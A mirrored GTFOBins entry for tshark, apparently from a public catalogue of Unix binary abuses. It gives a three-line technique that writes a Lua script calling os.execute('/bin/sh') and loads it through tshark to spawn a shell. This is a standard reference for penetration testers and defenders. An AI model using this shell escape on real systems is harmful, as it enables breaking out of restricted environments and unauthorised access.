mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
10 lines
213 B
Markdown
10 lines
213 B
Markdown
|
---
|
||
|
description: This program is able to execute [`lua`](/gtfobins/less/) code.
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
TF=$(mktemp)
|
||
|
echo 'os.execute("/bin/sh")' >$TF
|
||
|
tshark -Xlua_script:$TF
|
||
|
---
|